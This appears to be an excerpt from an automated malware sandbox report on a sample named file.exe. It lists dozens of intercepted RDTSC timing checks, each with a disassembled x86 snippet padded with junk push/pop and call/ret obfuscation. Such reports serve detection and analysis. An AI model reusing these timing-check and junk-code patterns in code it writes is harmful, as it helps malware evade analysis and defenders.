          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 844FE6 second address: 845006 instructions: 0x00000000 rdtsc 0x00000002 js 00007FBA8CEE23C6h 0x00000008 push eax 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d pushad 0x0000000e popad 0x0000000f pushad 0x00000010 popad 0x00000011 popad 0x00000012 jmp 00007FBA8CEE23CAh 0x00000017 push eax 0x00000018 push edx 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 845006 second address: 84500A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 84A897 second address: 84A89B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 84A89B second address: 84A8C1 instructions: 0x00000000 rdtsc 0x00000002 jl 00007FBA8CCF3D56h 0x00000008 jmp 00007FBA8CCF3D5Fh 0x0000000d pop edx 0x0000000e pop eax 0x0000000f jmp 00007FBA8CCF3D5Dh 0x00000014 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 84F32E second address: 84F33E instructions: 0x00000000 rdtsc 0x00000002 jp 00007FBA8CEE23C6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 84F33E second address: 84F342 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 84F342 second address: 84F348 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 84F348 second address: 84F34D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 84F34D second address: 84F369 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FBA8CEE23CDh 0x00000009 je 00007FBA8CEE23C6h 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 popad 0x00000014 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 84F4A5 second address: 84F4AB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 84F4AB second address: 84F4BF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007FBA8CEE23C6h 0x0000000a popad 0x0000000b pushad 0x0000000c pushad 0x0000000d popad 0x0000000e pushad 0x0000000f popad 0x00000010 pushad 0x00000011 popad 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 84F4BF second address: 84F4D6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push edx 0x00000006 jns 00007FBA8CCF3D56h 0x0000000c pushad 0x0000000d popad 0x0000000e pop edx 0x0000000f jne 00007FBA8CCF3D5Ch 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 84F4D6 second address: 84F4F6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007FBA8CEE23D9h 0x0000000c rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 84F4F6 second address: 84F4FB instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 84F4FB second address: 84F501 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 84F501 second address: 84F50A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 84F50A second address: 84F50E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 84FC4D second address: 84FC57 instructions: 0x00000000 rdtsc 0x00000002 jc 00007FBA8CCF3D56h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 84FE26 second address: 84FE4D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 jmp 00007FBA8CEE23D4h 0x0000000b jmp 00007FBA8CEE23CDh 0x00000010 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8551A9 second address: 8551B8 instructions: 0x00000000 rdtsc 0x00000002 jc 00007FBA8CCF3D56h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push ecx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 853F6D second address: 853F71 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 853F71 second address: 853F88 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FBA8CCF3D5Dh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 853F88 second address: 853F9C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FBA8CEE23D0h 0x00000009 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 853F9C second address: 853FA6 instructions: 0x00000000 rdtsc 0x00000002 jc 00007FBA8CCF3D56h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 853FA6 second address: 853FC0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edi 0x00000007 ja 00007FBA8CEE23C6h 0x0000000d pop edi 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 jnl 00007FBA8CEE23C6h 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 853FC0 second address: 853FC6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 853FC6 second address: 853FCC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 853FCC second address: 853FD9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jg 00007FBA8CCF3D56h 0x0000000d rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 853FD9 second address: 854001 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBA8CEE23D1h 0x00000007 jmp 00007FBA8CEE23D3h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 81BF10 second address: 81BF14 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 81BF14 second address: 81BF24 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a jnp 00007FBA8CEE23C6h 0x00000010 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 81BF24 second address: 81BF7C instructions: 0x00000000 rdtsc 0x00000002 js 00007FBA8CCF3D56h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jmp 00007FBA8CCF3D5Bh 0x0000000f popad 0x00000010 nop 0x00000011 push 00000000h 0x00000013 push eax 0x00000014 call 00007FBA8CCF3D58h 0x00000019 pop eax 0x0000001a mov dword ptr [esp+04h], eax 0x0000001e add dword ptr [esp+04h], 00000017h 0x00000026 inc eax 0x00000027 push eax 0x00000028 ret 0x00000029 pop eax 0x0000002a ret 0x0000002b jmp 00007FBA8CCF3D60h 0x00000030 lea eax, dword ptr [ebp+13C75CCDh] 0x00000036 mov edx, dword ptr [ebp+13AC28C2h] 0x0000003c nop 0x0000003d pushad 0x0000003e push eax 0x0000003f push edx 0x00000040 pushad 0x00000041 popad 0x00000042 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 81BF7C second address: 81BF9B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007FBA8CEE23D7h 0x0000000d rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 81BF9B second address: 81BFB7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBA8CCF3D5Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a push eax 0x0000000b push esi 0x0000000c push eax 0x0000000d push edx 0x0000000e jg 00007FBA8CCF3D56h 0x00000014 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 81C0AD second address: 81C0BC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBA8CEE23CBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 81C0BC second address: 81C0C1 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 81C463 second address: 81C467 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 81C467 second address: 81C46D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 81C46D second address: 66986A instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 jmp 00007FBA8CEE23CCh 0x00000008 pop esi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b nop 0x0000000c mov dword ptr [ebp+13AC22BFh], eax 0x00000012 push dword ptr [ebp+13AC01A9h] 0x00000018 mov edx, dword ptr [ebp+13AC257Ch] 0x0000001e call dword ptr [ebp+13AC1AD7h] 0x00000024 pushad 0x00000025 pushad 0x00000026 add dword ptr [ebp+13AC1B08h], ebx 0x0000002c jnc 00007FBA8CEE23C8h 0x00000032 popad 0x00000033 xor eax, eax 0x00000035 stc 0x00000036 mov edx, dword ptr [esp+28h] 0x0000003a jmp 00007FBA8CEE23CFh 0x0000003f mov dword ptr [ebp+13AC28C2h], eax 0x00000045 pushad 0x00000046 mov ecx, dword ptr [ebp+13AC2976h] 0x0000004c mov ax, cx 0x0000004f popad 0x00000050 mov esi, 0000003Ch 0x00000055 je 00007FBA8CEE23CCh 0x0000005b add esi, dword ptr [esp+24h] 0x0000005f jmp 00007FBA8CEE23D6h 0x00000064 jno 00007FBA8CEE23D4h 0x0000006a lodsw 0x0000006c sub dword ptr [ebp+13AC1B08h], edi 0x00000072 add eax, dword ptr [esp+24h] 0x00000076 add dword ptr [ebp+13AC1B08h], ecx 0x0000007c mov ebx, dword ptr [esp+24h] 0x00000080 cmc 0x00000081 push eax 0x00000082 pushad 0x00000083 push eax 0x00000084 jmp 00007FBA8CEE23D5h 0x00000089 pop eax 0x0000008a push eax 0x0000008b push edx 0x0000008c pushad 0x0000008d popad 0x0000008e rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 81C5AD second address: 81C5B1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 81C6E9 second address: 81C6EE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 81C9CD second address: 81C9D2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 81C9D2 second address: 81CA19 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c jmp 00007FBA8CEE23D1h 0x00000011 push 00000004h 0x00000013 mov dl, ah 0x00000015 nop 0x00000016 push eax 0x00000017 push edx 0x00000018 pushad 0x00000019 jmp 00007FBA8CEE23CFh 0x0000001e jmp 00007FBA8CEE23D2h 0x00000023 popad 0x00000024 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 81CE52 second address: 81CE57 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 81CE57 second address: 81CEAE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov dword ptr [esp], eax 0x0000000a push 00000000h 0x0000000c push eax 0x0000000d call 00007FBA8CEE23C8h 0x00000012 pop eax 0x00000013 mov dword ptr [esp+04h], eax 0x00000017 add dword ptr [esp+04h], 00000019h 0x0000001f inc eax 0x00000020 push eax 0x00000021 ret 0x00000022 pop eax 0x00000023 ret 0x00000024 movzx edx, ax 0x00000027 push 0000001Eh 0x00000029 mov dx, 31A4h 0x0000002d nop 0x0000002e push eax 0x0000002f push edx 0x00000030 pushad 0x00000031 jmp 00007FBA8CEE23CDh 0x00000036 jmp 00007FBA8CEE23D1h 0x0000003b popad 0x0000003c rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 81CEAE second address: 81CEB3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 81CEB3 second address: 81CEC6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007FBA8CEE23C6h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push edi 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 pop eax 0x00000013 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 81D006 second address: 81D02D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBA8CCF3D65h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FBA8CCF3D5Bh 0x00000011 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 81D227 second address: 81D22B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 81D31B second address: 81D321 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 81D321 second address: 81D363 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBA8CEE23D7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007FBA8CEE23CFh 0x0000000f nop 0x00000010 movzx ecx, bx 0x00000013 lea eax, dword ptr [ebp+13C75D11h] 0x00000019 and edx, dword ptr [ebp+13C6C98Ah] 0x0000001f nop 0x00000020 push eax 0x00000021 push edx 0x00000022 push eax 0x00000023 push edx 0x00000024 push eax 0x00000025 pop eax 0x00000026 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 81D363 second address: 81D375 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBA8CCF3D5Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 81D375 second address: 81D3E9 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007FBA8CEE23C8h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b pushad 0x0000000c jmp 00007FBA8CEE23D4h 0x00000011 jo 00007FBA8CEE23C8h 0x00000017 push ebx 0x00000018 pop ebx 0x00000019 popad 0x0000001a nop 0x0000001b and ecx, dword ptr [ebp+13AC2832h] 0x00000021 lea eax, dword ptr [ebp+13C75CCDh] 0x00000027 push 00000000h 0x00000029 push esi 0x0000002a call 00007FBA8CEE23C8h 0x0000002f pop esi 0x00000030 mov dword ptr [esp+04h], esi 0x00000034 add dword ptr [esp+04h], 0000001Ch 0x0000003c inc esi 0x0000003d push esi 0x0000003e ret 0x0000003f pop esi 0x00000040 ret 0x00000041 nop 0x00000042 push eax 0x00000043 pushad 0x00000044 push esi 0x00000045 pop esi 0x00000046 pushad 0x00000047 popad 0x00000048 popad 0x00000049 pop eax 0x0000004a push eax 0x0000004b js 00007FBA8CEE23D4h 0x00000051 push eax 0x00000052 push edx 0x00000053 jne 00007FBA8CEE23C6h 0x00000059 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 81D3E9 second address: 7F9DFF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 nop 0x00000007 push 00000000h 0x00000009 push ebp 0x0000000a call 00007FBA8CCF3D58h 0x0000000f pop ebp 0x00000010 mov dword ptr [esp+04h], ebp 0x00000014 add dword ptr [esp+04h], 00000014h 0x0000001c inc ebp 0x0000001d push ebp 0x0000001e ret 0x0000001f pop ebp 0x00000020 ret 0x00000021 mov dword ptr [ebp+13AC1896h], eax 0x00000027 call dword ptr [ebp+13AC5631h] 0x0000002d pushad 0x0000002e push eax 0x0000002f push edx 0x00000030 js 00007FBA8CCF3D56h 0x00000036 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7F9DFF second address: 7F9E14 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jne 00007FBA8CEE23C8h 0x0000000c pushad 0x0000000d push ecx 0x0000000e pop ecx 0x0000000f push edi 0x00000010 pop edi 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8542B3 second address: 8542BD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push ebx 0x00000007 pop ebx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 85444E second address: 85446A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 jmp 00007FBA8CEE23D6h 0x0000000b rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8545B9 second address: 8545C8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 pushad 0x00000009 popad 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8545C8 second address: 8545CE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 854CF0 second address: 854CF9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 pushad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 854CF9 second address: 854CFF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8582F1 second address: 858325 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FBA8CCF3D65h 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c jmp 00007FBA8CCF3D68h 0x00000011 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 858325 second address: 858330 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jns 00007FBA8CEE23C6h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 858330 second address: 858338 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 85CCB0 second address: 85CCB4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 85CCB4 second address: 85CCC1 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push ebx 0x0000000a pop ebx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 85CCC1 second address: 85CCE8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 jnl 00007FBA8CEE23CEh 0x0000000e push edi 0x0000000f jmp 00007FBA8CEE23CDh 0x00000014 pushad 0x00000015 popad 0x00000016 pop edi 0x00000017 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 85CCE8 second address: 85CD0A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FBA8CCF3D5Bh 0x00000009 jmp 00007FBA8CCF3D63h 0x0000000e rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 85D2E7 second address: 85D2EB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 85D6FC second address: 85D718 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBA8CCF3D62h 0x00000007 jne 00007FBA8CCF3D62h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 85D718 second address: 85D734 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007FBA8CEE23C6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 jng 00007FBA8CEE23C6h 0x00000016 jno 00007FBA8CEE23C6h 0x0000001c rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 85D734 second address: 85D75A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBA8CCF3D68h 0x00000007 jmp 00007FBA8CCF3D5Ah 0x0000000c pop edx 0x0000000d pop eax 0x0000000e rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 85D8A6 second address: 85D8B4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push eax 0x00000006 pushad 0x00000007 popad 0x00000008 pushad 0x00000009 popad 0x0000000a pop eax 0x0000000b push edi 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 85DB1F second address: 85DB25 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 85DB25 second address: 85DB29 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 85DB29 second address: 85DB51 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007FBA8CCF3D61h 0x0000000c push ebx 0x0000000d pop ebx 0x0000000e push ebx 0x0000000f pop ebx 0x00000010 popad 0x00000011 pop edx 0x00000012 pop eax 0x00000013 push edx 0x00000014 jg 00007FBA8CCF3D69h 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 85DCEB second address: 85DCEF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 85E0E8 second address: 85E10D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FBA8CCF3D5Dh 0x00000009 popad 0x0000000a jmp 00007FBA8CCF3D63h 0x0000000f rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 85C9E7 second address: 85C9F2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7CA740 second address: 7CA74C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007FBA8CCF3D56h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7CA74C second address: 7CA752 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8607CE second address: 8607D4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8607D4 second address: 8607D8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 860936 second address: 860946 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jne 00007FBA8CCF3D56h 0x0000000a jne 00007FBA8CCF3D56h 0x00000010 rdtsc
